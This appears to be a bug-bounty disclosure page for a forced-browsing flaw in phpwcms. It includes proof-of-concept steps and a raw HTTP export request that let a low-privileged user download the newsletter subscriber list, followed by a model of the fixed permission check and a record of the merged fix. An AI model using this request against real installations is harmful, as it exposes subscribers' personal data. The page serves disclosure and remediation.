Forced Browsing in slackero/phpwcms

Valid

Reported on

Aug 31st 2021


✍️ Description

A malicious actor is able to reveal the list and details of newsletter subscribers.

🕵️‍♂️ Proof of Concept - Method 1:

This method requires a proxy utility, like BurpSuite.

  • With an administrator user, create some newsletter subscribers under the Communication>>Newsletter Subscribers menu.
  • Create a low-privileged user who has no access to manage the subscribers (In my case, I created a simple user without any administrative privileges).
  • Log in as the low-privileged user, then obtain the PHPSESSID value from the cookie and the current csrftoken value from the URL of any ordinary GET request.
  • Replace the PHPSESSID and csrftoken values in the following GET request with the values extracted in the previous step.

GET /include/inc_act/act_export.php?csrftoken=[INSERT_CSRFTOKEN_HERE]&action=exportsubscriber HTTP/1.1
Host: localhost
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=[INSERT_PHPSESSID_HERE]; phpwcmsBELang=en
Connection: close

After sending this request, the server's response contains the list of subscribed users with their name, email, verification status and last modification status.

🕵️‍♂️ Proof of Concept - Method 2:

  • With an administrator user, create some newsletter subscribers under the Communication>>Newsletter Subscribers menu.
  • Create a low-privileged user who has no access to manage the subscribers (In my case, I created a simple user without any administrative privileges).
  • Log in as the low-privileged user and obtain the csrftoken value from the URL of any ordinary GET request.
  • Still logged in as the low-privileged user, browse to the following URL, replacing only the csrftoken value.

https://[SERVERADDRESS]/include/inc_act/act_export.php?csrftoken=[INSERT_CSRFTOKEN_HERE]&action=exportsubscriber

💥 Impact

A low-privileged user can retrieve the full list of newsletter subscribers and their details.
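The root cause the two methods demonstrate is that the export endpoint accepts a valid csrftoken as if it were proof of privilege. A CSRF token only ties a request to the session that rendered the page; every logged-in user, including the low-privileged one, holds one, so the endpoint still needs its own authorization check. The following model is an added illustration and is not phpwcms code: the Session class, the permission name newsletter.subscribers.manage, the handler functions and the subscriber records are all constructed for this example, and the "fixed" handler shows the shape of the check rather than the project's actual patch.

```python
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Session:
    """Server-side state for one logged-in backend user (constructed model)."""
    user: str
    csrftoken: str
    # Permission strings are an assumption of this model, not phpwcms' own names.
    permissions: frozenset = field(default_factory=frozenset)


class Forbidden(Exception):
    """Raised when a request is rejected before any data is returned."""


# Constructed sample records; not real subscribers.
SUBSCRIBERS = [
    {"name": "Alice Example", "email": "alice@example.test", "verified": True},
    {"name": "Bob Example", "email": "bob@example.test", "verified": False},
]

MANAGE_SUBSCRIBERS = "newsletter.subscribers.manage"  # hypothetical permission name


def _check_csrf(session, params):
    # A CSRF token only proves the request came from a page this session
    # rendered; every logged-in user, however unprivileged, holds a valid one.
    if params.get("csrftoken") != session.csrftoken:
        raise Forbidden("csrftoken mismatch")


def export_subscribers_vulnerable(session, params):
    """Behaviour reported on this page: token check only, no authorization."""
    _check_csrf(session, params)
    if params.get("action") != "exportsubscriber":
        return []
    return list(SUBSCRIBERS)


def export_subscribers_fixed(session, params):
    """Hardened form: the caller must also hold the manage-subscribers permission."""
    _check_csrf(session, params)
    if MANAGE_SUBSCRIBERS not in session.permissions:
        raise Forbidden(f"{session.user} may not export subscribers")
    if params.get("action") != "exportsubscriber":
        return []
    return list(SUBSCRIBERS)


def rows_returned(handler, session, params):
    """Number of subscriber rows a handler hands back, or -1 when it refuses."""
    try:
        return len(handler(session, params))
    except Forbidden:
        return -1


ADMIN = Session("admin", "tok-admin-1", frozenset({MANAGE_SUBSCRIBERS}))
LOW_PRIV = Session("editor", "tok-editor-1")  # no administrative permissions


def demo():
    """Send the same exportsubscriber request from both users to both handlers."""
    results = {}
    for label, session in (("admin", ADMIN), ("low_priv", LOW_PRIV)):
        params = {"csrftoken": session.csrftoken, "action": "exportsubscriber"}
        results[label] = {
            "vulnerable": rows_returned(export_subscribers_vulnerable, session, params),
            "fixed": rows_returned(export_subscribers_fixed, session, params),
        }
    return results


if __name__ == "__main__":
    for user, outcome in demo().items():
        print(user, outcome)
```

Running the block shows the low-privileged session receiving every subscriber row from the vulnerable handler and being refused by the fixed one, while the administrator is served by both. The permission check sits before the action dispatch on purpose: any other action this endpoint grows later is covered by the same gate, rather than relying on each branch to remember its own check.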

We have contacted a member of the slackero/phpwcms team and are waiting to hear back 3 months ago
Oliver Georgi validated this vulnerability 3 months ago
TheLabda has been awarded the disclosure bounty
The fix bounty is now up for grabs
Oliver Georgi confirmed that a fix has been merged on 4babfa 3 months ago
Oliver Georgi has been awarded the fix bounty